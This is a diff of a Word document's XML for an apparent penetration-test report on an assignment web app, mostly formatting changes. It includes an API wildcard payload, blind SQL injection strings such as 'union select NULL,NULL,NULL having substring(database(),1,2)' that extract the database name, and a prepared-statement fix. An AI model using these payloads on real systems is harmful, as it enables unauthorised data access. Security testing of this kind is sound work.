+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>VirtualHost</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> *:443&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9266,7 +9718,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    ServerName www.example.com</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ServerName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> www.example.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9294,7 +9766,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    SSLEngine on</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLEngine</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> on</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9322,7 +9814,28 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    SSLCertificateFile "/path/to/www.example.com.cert"</w:t>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLCertificateFile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> "/path/to/www.example.com.cert"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9350,8 +9863,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">    SSLCertificateKeyFile "/path/to/www.example.com.key"</w:t>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>SSLCertificateKeyFile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> "/path/to/www.example.com.key"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9379,7 +9911,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;/VirtualHost&gt;</w:t>
+              <w:t>&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>VirtualHost</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9475,7 +10027,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc71399651"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71451223"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -9549,7 +10101,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71399652"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71451224"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9611,43 +10163,19 @@
               <w:t xml:space="preserve"> vulnerability presents in the training lookup API. </w:t>
             </w:r>
             <w:r>
-              <w:t>Exploiting this vulnerability could result information leakage. Since all trainings are intended to be publicly visible, we conduct that this table contains no sensitive information</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> Therefore,</w:t>
+              <w:t>Exploiting this vulnerability could result information leakage. Since all trainings are intended to be publicly visible, we conduct that this table contains no sensitive information. Therefore, it is said to be low-risk as attackers can only read information within t</w:t>
+            </w:r>
+            <w:r>
+              <w:t>h</w:t>
+            </w:r>
+            <w:r>
+              <w:t>at</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
-              <w:t>i</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">t is said to be low-risk </w:t>
-            </w:r>
-            <w:r>
-              <w:t>as</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> attackers can only read information within t</w:t>
-            </w:r>
-            <w:r>
-              <w:t>h</w:t>
-            </w:r>
-            <w:r>
-              <w:t>at</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>table</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
+              <w:t>table.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9677,7 +10205,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71399653"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71451225"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9719,7 +10247,19 @@
               <w:t xml:space="preserve"> [1]</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> as the training name in the API. Running the following payload in the browser console after login will list all the trainings in the store.</w:t>
+              <w:t xml:space="preserve"> as the training name in the API.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> After login,</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>r</w:t>
+            </w:r>
+            <w:r>
+              <w:t>unning the following payload in the browser console will list all the trainings in the store.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9741,7 +10281,33 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>Note that the apikey needs to be replace with a valid one)</w:t>
+              <w:t xml:space="preserve">Note that the </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>apikey</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> needs to be replace</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>d</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> with a valid one)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9749,7 +10315,6 @@
               <w:widowControl w:val="0"/>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -9765,6 +10330,7 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-variable"/>
@@ -9792,6 +10358,7 @@
               </w:rPr>
               <w:t>ajax</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -9839,7 +10406,67 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>"http://assignment-hermes.unimelb.life/api/store.php?name=%%"</w:t>
+              <w:t>"http://assignment-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>hermes.unimelb.life</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>api</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>store.php?name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="cm-string"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>=%%"</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9943,6 +10570,7 @@
                 <w:szCs w:val="18"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="cm-property"/>
@@ -9952,6 +10580,7 @@
               </w:rPr>
               <w:t>apikey</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10011,7 +10640,17 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>}).</w:t>
+              <w:t>}</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="message-body"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>).</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10022,6 +10661,7 @@
               </w:rPr>
               <w:t>done</w:t>
             </w:r>
+            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="message-body"/>
@@ -10194,7 +10834,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71399654"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71451226"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10248,7 +10888,19 @@
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>an list out all the trainings in the store.</w:t>
+              <w:t>an list out all the trainings in the store</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>, which are intended to be publicly visible</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10278,7 +10930,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71399655"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71451227"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10359,7 +11011,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71399656"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71451228"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10418,13 +11070,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve">, possible likelihood and </w:t>
-            </w:r>
-            <w:r>
-              <w:t>negligible</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> impact suggest a </w:t>
+              <w:t xml:space="preserve">, possible likelihood and negligible impact suggest a </w:t>
             </w:r>
             <w:r>
               <w:t>low</w:t>
@@ -10463,7 +11109,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71399657"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71451229"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10532,7 +11178,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="44" w:name="_Toc71399658"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71451230"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -10625,7 +11271,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = $con-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>prepare(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10653,7 +11335,61 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>bind_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>param</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10681,7 +11417,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;execute();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>execute(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10709,7 +11481,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;close();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>close(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10727,7 +11535,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="46" w:name="_Toc71399659"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71451231"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -10797,7 +11605,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc71399660"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71451232"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
@@ -10819,7 +11627,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
-      <w:bookmarkStart w:id="49" w:name="_Toc71399661"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71451233"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
@@ -11080,7 +11888,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11105,13 +11933,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>rom the</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> responses of a) and b) </w:t>
+              <w:t xml:space="preserve">rom </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>a)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11141,7 +11975,26 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> and three columns are selected in the original statement.</w:t>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">From b) we know that </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>three columns are selected in the original statement.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11193,7 +12046,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL having</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11236,7 +12109,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11254,7 +12147,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of database() correctly.</w:t>
+              <w:t xml:space="preserve">In a), we use having clause to construct the statement such that the response will be “true” only if we have guessed the first character of </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>) correctly.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11373,15 +12280,39 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>t might be the case that we have found the whole string, or that we have ran out the candidate charset.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
+              <w:t>t might be the case that we have found the whole string, or that we have ran out the candidate charset</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>, which should be rare case</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> but if it happens, we will need to expand our charset</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
